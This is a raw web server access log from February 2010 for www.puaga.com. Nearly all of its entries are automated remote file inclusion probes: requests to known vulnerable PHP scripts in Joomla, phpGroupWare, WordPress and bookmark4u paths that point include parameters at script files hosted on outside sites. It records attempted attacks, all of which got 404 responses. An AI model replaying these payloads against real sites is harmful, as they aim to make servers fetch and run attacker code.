58.150.99.144 - - [15/Feb/2010:07:21:28 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:28 -0800] "GET /logs/access_100115.log///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:31 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:31 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:31 -0800] "GET /logs/access_100115.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:40 -0800] "GET /logs/access_100103.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:21:41 -0800] "GET /logs/access_100111.log/////administrator/components/com_uhp/config_uhp.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:54 -0800] "GET /logs/access_100103.log///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:58 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:58 -0800] "GET /logs/access_100115.log///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:21:58 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:22:26 -0800] "GET /logs/access_100103.log///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:23:02 -0800] "GET /logs/access_100125.log/modules/4nAlbum/public/displayCategory.php?basepath=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:23:10 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:23:24 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:22 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:22 -0800] "GET /logs/access_100115.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:22 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:26 -0800] "GET /logs///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:26 -0800] "GET //temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:24:26 -0800] "GET /logs/access_100115.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:24:27 -0800] "GET /logs/access_100123.log/modules/4nAlbum/public/displayCategory.php?basepath=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:25:16 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:25:16 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:25:17 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:25:48 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:26:25 -0800] "GET /logs/access_100103.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:26:29 -0800] "GET /logs/access_100103.log%20%20///temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:26:30 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:26:30 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:26:30 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:07:26:41 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:07:26:41 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [15/Feb/2010:07:26:41 -0800] "GET /delete_all.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:26:51 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/write_comment_update.php?board_skin_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:06 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:24 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:24 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:24 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:25 -0800] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:25 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:25 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:31 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:32 -0800] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:27:42 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:27:42 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:27:42 -0800] "GET /logs/access_100125.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:07:27:48 -0800] "GET /logs/access_100202.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:27:49 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:27:49 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:27:49 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:27:57 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:28:02 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:07:28:05 -0800] "GET /logs/access_100126.log%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:28:06 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:28:06 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:28:06 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:28:22 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:28:22 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:28:22 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:28:37 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [15/Feb/2010:07:28:48 -0800] "GET /logs/access_100214.log HTTP/1.0" 200 1930366 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:28:51 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [15/Feb/2010:07:29:03 -0800] "GET /logs/access_100202.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:29:09 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [15/Feb/2010:07:29:14 -0800] "GET /logs/access_100111.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:29:29 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:29:30 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:29:30 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:29:44 -0800] "GET ///////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:29:44 -0800] "GET /logs/access_100204.log%20%20////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:29:44 -0800] "GET /logs////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:29:51 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:30:08 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:30:24 -0800] "GET /logs/access_100119.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:30:25 -0800] "GET /logs/access_100204.log%20%20////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:30:25 -0800] "GET ///////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:30:25 -0800] "GET /logs////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:30:30 -0800] "GET /logs/access_100121.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:30:43 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:30:43 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:30:43 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [15/Feb/2010:07:31:14 -0800] "GET /logs/access_100112.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:31:19 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:31:39 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:31:39 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:31:39 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:32:14 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:32:14 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:32:14 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:32:17 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:32:23 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:32:23 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:32:23 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:07:32:27 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:32:47 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:34:45 -0800] "GET /logs/access_100204.log////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:35:03 -0800] "GET /logs/access_100127.log////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:35:19 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:35:43 -0800] "GET /logs/access_100119.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [15/Feb/2010:07:35:48 -0800] "GET /logs/access_100121.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:35:50 -0800] "GET /logs/access_100124.log////////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:37:18 -0800] "GET /logs/access_100203.log%20%20/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:37:18 -0800] "GET /logs/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
